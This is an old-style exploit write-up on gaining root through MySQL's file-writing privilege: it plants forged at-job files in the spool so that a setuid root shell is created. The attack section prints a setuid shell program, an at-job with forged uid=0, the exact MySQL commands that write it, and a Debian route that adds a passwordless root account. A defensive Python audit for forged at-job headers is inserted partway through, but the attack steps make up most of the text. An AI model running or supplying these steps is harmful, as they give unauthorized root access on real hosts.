MySQL attack

  • introduction
    MySQL is a well-known free SQL server and can read and write files on the host. Your user must have the file privilege (the File_priv column) set to "Y" in the user table of the mysql database. On some distributions mysqld runs as root, so you can write files with root privileges. If you compile MySQL yourself and start it with startup.sh, it also runs as uid 0. The default umask is 111, so the written files aren't executable. In some cases it is important to have executable files, so we have to use a small trick to bypass this "protection" (for example on Debian).
  • affected systems

  • at attack (see myattack.c)
    at is a tool to run programs at a certain time. It creates a file in a spool directory that is read by the at daemon or by crontab/atrun. Let's have a look at the directories:
                              linux                     bsd
    --------------------------------------------------------------------
    directory                 /var/spool/cron/atjobs    /var/at/jobs
    queue                     a                         c,E
    jobs need +x flag         yes                       no
    
    at job files are simple shell scripts. They have a few options in the header, and their filenames look like this:
    a 00001 00fce162
    v vvvvv vvvvvvvv
    | |     |
    | |     + date in minutes (0 will always work)
    | |
    | + an autoincrement id
    |
    + queue
      a ... Linux (Debian), c ... BSD default; see man at for more details
    
    Let's take a look at the file itself:
    #!/bin/sh
    # atrun uid=[uid] gid=[gid]
    # mail [user] 0
    ...
    set some environment variables
    ...
    execute some commands
    
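    As an added defender-side example (not from the original writeup): a small Python audit that parses at spool filenames and the "# atrun uid= gid=" header in the layout described above and flags jobs whose header uid does not match the owner of the spool file. The spool entries, owner uids and job bodies are constructed sample data.

```python
import re

# Constructed sample spool: filename -> (owner uid of the spool file, file body).
# Layout follows the writeup: queue letter, 5-digit sequence id, 8 hex digits of
# start time in minutes; the body carries the "# atrun uid= gid=" header line.
SAMPLE_SPOOL = {
    "a0000100fce162": (1000, "#!/bin/sh\n# atrun uid=1000 gid=1000\n# mail andi 0\n"
                             "PATH=/usr/bin\n/home/andi/backup.sh\n"),
    "a0000200000000": (1000, "#!/bin/sh\n# atrun uid=0 gid=0\n# mail root 0\n"
                             "chmod 4755 /tmp/s\n"),
    "c0000300fce163": (0, "#!/bin/sh\n# atrun uid=0 gid=0\n# mail root 0\n"
                          "/usr/sbin/cleanup\n"),
}

NAME_RE = re.compile(r"^([a-zA-Z])(\d{5})([0-9a-f]{8})$")
ATRUN_RE = re.compile(r"^# atrun uid=(\d+) gid=(\d+)\s*$", re.MULTILINE)


def parse_job_name(name):
    """Split an at job filename into (queue, sequence id, start time in minutes)."""
    m = NAME_RE.match(name)
    if not m:
        raise ValueError(f"not an at job filename: {name!r}")
    return m.group(1), int(m.group(2)), int(m.group(3), 16)


def parse_atrun_header(body):
    """Return (uid, gid) from the '# atrun uid=... gid=...' line, or None if absent."""
    m = ATRUN_RE.search(body)
    return (int(m.group(1)), int(m.group(2))) if m else None


def audit_job(name, owner_uid, body):
    """Return a list of findings for one spool file; an empty list means it looks consistent."""
    _queue, _seq, start = parse_job_name(name)
    header = parse_atrun_header(body)
    if header is None:
        return ["missing atrun header"]
    uid, _gid = header
    findings = []
    if uid != owner_uid:
        findings.append(f"header uid {uid} differs from spool file owner uid {owner_uid}")
    if uid == 0 and owner_uid != 0:
        findings.append("job claims to run as root but the spool file is not owned by root")
    if start == 0:
        findings.append("start time 0: runs at the next atrun pass")
    return findings


def audit_spool(spool):
    """Audit every job in a spool mapping and return only the entries with findings."""
    result = {}
    for name, (owner_uid, body) in spool.items():
        findings = audit_job(name, owner_uid, body)
        if findings:
            result[name] = findings
    return result
```

    On a real host, replace SAMPLE_SPOOL with the directory listing (os.stat().st_uid for the owner) of the spool path from the table above.
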
  • vulnerabilities
    So the idea is to create (not overwrite) a file that will be executed by root (like .bashrc or cron jobs). But in most cases these files already exist, so we need to write a new at job that will be executed via cron. The atd daemon on OpenBSD executes the job files even if they don't have the +x flag set. On Debian we have to use a small trick to exploit this bug.
  • how to exploit it under openbsd
    First you create the well-known boomsh.c:
    $ cat > /tmp/boomsh.c << EOF
    int main() { setuid(0); setgid(0); system("/bin/sh"); }
    EOF
    $ gcc /tmp/boomsh.c -o /tmp/s
    
    Now create a new at job file (you can also insert it directly into the table). Let's have a look at the file name:
    # ls -al /var/spool/atjobs
    -rwx------    1 andi     andi            655 Jul  5 22:39 a0000100fce162
    
    $ cat > /tmp/a000100fce162 << EOF
    #!/bin/sh
    # atrun uid=0 gid=0
    # mail       root 0
    chown root.root /tmp/s
    chmod 4755 /tmp/s
    EOF
    
    It's important to set uid and gid in the second line, otherwise it doesn't work:
    $ mysql -u user -p db
    > create table x (y text); 
    > load data infile "/home/user/atjob" into table x; 
    > select * into outfile "/var/at/jobs/a0735000000000" fields escaped by '' from x; 
    
    We need the "fields escaped by ''" option so that newlines are written literally instead of being escaped. Now wait ten minutes and look in the /tmp directory ...
  • how to exploit it under debian (linux?)
    As I said before, under Linux our at job needs to have the +x flag set, so we have to exploit the symlink vulnerability in at. We create a crontab for the user daemon to open a shell with uid 1. Then we read the .seq file, create a file called "a[.seq value + 1]00[now+10]", add an at job via the at command and enter the following command: "r00t::0:0:root::/bin/sh".
  • default installation
    After a default installation root can connect from localhost without a password. So if the victim is running Squid and it allows the CONNECT method, you can connect to localhost:3306. Use SQUID NetPipe for it.